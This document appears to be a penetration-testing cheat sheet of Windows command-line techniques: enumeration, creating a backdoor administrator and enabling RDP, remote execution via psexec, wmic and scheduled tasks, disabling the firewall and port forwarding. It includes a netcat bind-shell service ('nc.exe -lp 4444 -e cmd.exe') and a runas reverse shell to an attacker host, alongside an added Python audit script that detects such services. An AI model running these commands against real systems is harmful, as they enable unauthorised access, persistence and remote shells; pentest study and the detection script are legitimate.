# 1 Windows cmd kungfu

## Read Files

```
type myfile                  ..display
type *.txt                   ..multiple
type my1 my2                 ..multiple
type my1 | find /i "pass"    ..search-in-file
type my1 | findstr [regex]   ..regex
more my1                     ..onepage-at-a-time
```

## Environment

```
set           ..view env vars
set path      ..view path
set username  ..view usern
```

## Search

* /b - bare output (paths only, no headers or summary)
* /s - recurse into subdirectories

```
dir /b /s mydir\file
dir /b /s c:\pass.txt          ..search all of c: (subfolders included) for 'pass.txt'; wildcards work too
dir /b /s %systemroot%\hosts   ..find the hosts file
```

## Software Inventory Search

```
dir /s "c:\Program Files"
dir /s "c:\Program Files (x86)"
```

## Windows Users

```
net user                                  ..list local users
net user mike p$$wrd /add                 ..create user
net user mike /del                        ..delete user

net localgroup                            ..list local groups
net localgroup administrators             ..members of Administrators
net localgroup administrators mike /add   ..add to group
net localgroup administrators mike /del   ..remove from group
```

## AD Lockout Settings

```
net accounts /domain
```

## RDP Trick

* REF: [PrivEscWin-Churrasco](https://pentest.mxhx.org/win-privesc#churrasco)

```
> net user
> net user mikes hacks /add
> net localgroup administrators mikes /add

Allow Remote Access (enable RDP):
> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mikes -p hacks legacy    ..CONNECT WITH RDP !!! (user created above; 'legacy' is the target host)
```

## Windows Password policy

```
net accounts
net accounts /domain
wmic useraccount list brief
```

## Windows registry

```
reg query key1                          ..key1 e.g. HKLM\SOFTWARE\...
reg query \\mypc\key1                   ..same key on a remote machine
reg add key1 /v value /t type /d data   ..type e.g. REG_SZ, REG_DWORD
reg export key1 key.reg
reg import key.reg
```

## Windows smb

* REF: [MoveFilesSMB](https://pentest.mxhx.org/06-linux-privesc/04-transfer-files#smb)

```
session (IPC$ only):
net use \\IP pw /u:bob

mount a share on the next free drive letter / disconnect:
net use * \\IP\share pw /u:bob
net use \\IP /del
net use * /del /y

may need a machine- or domain-qualified user:
/u:machinename\bob
```

## Windows services

```
sc query                       ..running services
sc query state= all            ..all services (note the space after '=')
sc qc svcname                  ..service config: binary path, start type, account
sc \\10.0.0.5 qc mysvc         ..same, on a remote host
sc start mysvc
sc config mysvc start= demand  ..manual start
sc stop mysvc
services.msc                   ..gui

wmic:
wmic service where (displayname like "%hello%") get name
```

## Windows psexec

```
net use \\$IP /u:bob                    ..get smb session
psexec \\$IP -u bob -p pass -d command  ..-u/-p creds; -d: don't wait for the process to exit
psexec \\$IP ipconfig
psexec \\$IP cmd.exe
psexec \\$IP -s -d cmd.exe              ..-s: system, -d: detached/background (options go before the program)
```

## Windows schedule tasks

```
schtasks /query /s $IP
schtasks /create /tn taskname /s $IP /u bob /p pass /sc freq /st stime /sd sdate /tr command

run as SYSTEM (/ru SYSTEM, no password needed):
schtasks /create /tn taskname /s $IP /ru SYSTEM /sc HOURLY|ONCE|DAILY /st HH:MM /sd sdate /tr command
(/st is 24-hour HH:MM)
```

## Windows Services & Processes

```
net use \\$IP /u:bob  ..get smb session first!!
sc \\$IP query schedule
sc \\$IP create svcnm binpath= mycmd               ..non-service exe: SCM times it out after 30 sec
sc \\$IP create svcnm binpath= "cmd.exe /k mycmd"  ..will die
sc \\$IP create ncsvc binpath= "cmd.exe /k c:\Tools\nc.exe -lp 4444 -e cmd.exe"

sc \\$IP start svcnm
net time \\$IP

or 'ServifyThis'

wmic /node:10.x.x.x /user:bobadmin /password:p@ss process call create [command]

Multiple targets (one IP per line in the file):
wmic /node:@C:\tmp\iplist /user:bob /password:paxx   ..enters the interactive wmic prompt
process call create [command]

Look at processes:
wmic /node:$IP /user:bob /password:paxx
process list brief
process where processid="PID" delete
process where name="[name]" delete
```
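As an added defender-side example (not part of the original cheat sheet), a small Python audit that parses constructed `wmic service get Name,PathName,StartMode,StartName /format:csv` output and flags services built the way this section shows: a `cmd.exe /k` wrapper as the service binary, a netcat `-e` listener, or a binary living outside the usual install directories. The sample rows, the column layout and the `%SystemRoot%` expansion are assumptions.

```python
import csv
import re

# Constructed sample (assumption) in the shape of
#   wmic service get Name,PathName,StartMode,StartName /format:csv
# i.e. a leading blank line, a header row, unquoted comma-separated fields.
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode,StartName
WS01,Dnscache,C:\Windows\system32\svchost.exe -k NetworkService -p,Auto,NT AUTHORITY\NetworkService
WS01,Spooler,C:\Windows\System32\spoolsv.exe,Auto,LocalSystem
WS01,AcmeAgent,"C:\Program Files\Acme\agent.exe" --service,Auto,LocalSystem
WS01,svcnm,cmd.exe /k c:\Tools\nc.exe -lp 4444 -e cmd.exe,Manual,LocalSystem
WS01,updsvc,C:\Users\Public\upd.exe,Auto,LocalSystem
"""

# Directories a service binary is normally installed under (lower-case, trailing '\').
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _exe_path(pathname: str) -> str:
    """Return just the executable from a service PathName (quoted, or first token)."""
    p = pathname.strip()
    if p.startswith('"') and p.find('"', 1) > 0:
        return p[1:p.find('"', 1)]
    return p.split(" ", 1)[0]


def audit_services(wmic_csv: str) -> dict:
    """Map service name -> reasons it resembles a hand-made 'sc create' service."""
    rows = [r for r in csv.reader(wmic_csv.splitlines(), quoting=csv.QUOTE_NONE) if r]
    col = {name: i for i, name in enumerate(rows[0])}
    findings = {}
    for row in rows[1:]:
        if len(row) < len(rows[0]):
            continue  # malformed line: skip rather than misattribute columns
        name, path = row[col["Name"]], row[col["PathName"]]
        # %SystemRoot% is assumed to expand to C:\Windows on the sampled host.
        exe = _exe_path(path).lower().replace("%systemroot%", "c:\\windows")
        reasons = []
        if re.search(r"(^|\\)cmd(\.exe)?$", exe) and re.search(r"\s/[kc]\s", path, re.I):
            reasons.append("cmd.exe /k|/c wrapper as service binary")
        if re.search(r"\bnc(\.exe)?\b.*\s-e\s", path, re.I):
            reasons.append("netcat with -e (listener/shell as a service)")
        if not exe.startswith(TRUSTED_DIRS):
            reasons.append(f"binary outside standard directories: {exe}")
        if reasons:
            findings[name] = reasons
    return findings
```

Run it against real output by piping the wmic command above into a file and passing its contents to `audit_services`; a legitimate service in an unusual directory is a low-severity hit to verify, the wrapper and netcat matches are the ones to act on.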

## Windows Firewall

```
netsh /?   ..view network settings
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name="Comment" dir=in action=allow remoteip=$IP protocol=TCP localport=23
netsh advfirewall firewall delete rule name="Comment"

Port-forward (listen on 8000, forward to $IP:80):
netsh interface portproxy add v4tov4 listenport=8000 connectport=80 connectaddress=$IP
```

## runas

* Creates a reverse shell from a Windows server to Kali
* Uses netcat for Windows and runas.exe:

```
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc $IP 4444 -e cmd.exe"

Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
```
